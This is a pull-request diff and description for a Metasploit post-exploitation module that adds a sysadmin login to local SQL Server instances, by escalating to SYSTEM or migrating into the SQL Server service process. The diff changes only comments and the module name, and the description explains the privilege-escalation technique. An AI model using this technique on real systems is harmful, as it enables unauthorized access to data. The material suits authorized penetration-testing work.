--- a/modules/post/windows/manage/mssql_local_auth_bypass.rb
+++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb
@@ -40,11 +40,6 @@ class Metasploit3 < Msf::Post
 			], self.class)
 	end
 	
-	# TODO
-	# - test execute thread migration option
-	# - test incognito token stuff
-	# - test all fucntions on all version
-	# - run through ruby module validation process
 
 	def run
 				

--- a/modules/post/windows/manage/mssql_local_auth_bypass.rb
+++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb
@@ -368,7 +368,9 @@ class Metasploit3 < Msf::Post
 	## Method for executing cmd and returning the response
 	## 
 	## Note: This is from one of Jabra's modules - Thanks man!
-	## #craps out when escalating from local admin to system
+	## Note: This craps out when escalating from local admin to system
+	##       I assume it has something to do with the token, but don't 
+	##       really know.
 	##----------------------------------------------
 	def run_cmd(cmd,token=true)
 		opts = {'Hidden' => true, 'Channelized' => true, 'UseThreadToken' => token} 
@@ -442,9 +444,11 @@ class Metasploit3 < Msf::Post
 		end		
 	end	
 	
-	##
-	## Check user is already system
-	##
+	
+	## ----------------------------------------------
+	## Method to become SYSTEM if required
+	## Note: This is from one of Jabra's modules.
+	## ----------------------------------------------
 	def givemesystem
 		
 		# Statusing

--- a/modules/post/windows/manage/mssql_local_auth_bypass.rb
+++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Post
 
 	def initialize(info={})
 		super( update_info( info,
-				'Name'          => 'SQL Server - Local Authorization Bypass - Add SYSADMIN',
+				'Name'          => 'SQL Server - Local Authorization Bypass',
 				'Description'   => %q{ When this module is executed via an existing 
 				meterpreter session it can be used to add a sysadmin to local 
 				SQL Server instances.  It first attempts to gain LocalSystem privileges 
@@ -39,7 +39,6 @@ class Metasploit3 < Msf::Post
 				OptBool.new('VERBOSE',  [false, 'Set how verbose the output should be', 'false']),
 			], self.class)
 	end
-	
 
 	def run
 				


### PR DESCRIPTION
I have provide information about this module below. 

Whats the issue? 

LocalSystem is assigned syadmin privileges in SQL Server 2k-2k8 by default to support patching.  So LocalSystem = unauthorized data access.  Microsoft changed the default in SQL Server 2012 so that LocalSystem no longer has sysadmin privileges.  However, this can be overcome by migrating to the SQL Server process.  So running in SQL Server service process = unathorized access to data.

What does this module do?

When this module is executed via an existing meterpreter session it can be used to add a sysadmin to local SQL Server instances.  It first attempts to gain LocalSystem privileges using the "getsystem" escalation methods. If those privileges are not sufficient to add a sysadmin, then it will migrate to the SQL Server service process associated with the target instance.  The sysadmin login is added to the local SQL Server using native SQL clients and stored procedures.  If no instance is specified then the first identified instance will be used.   

Side Comment:

If I managed to screw up the pull request let me know.  I'm not great with git, so sorry ahead of time.
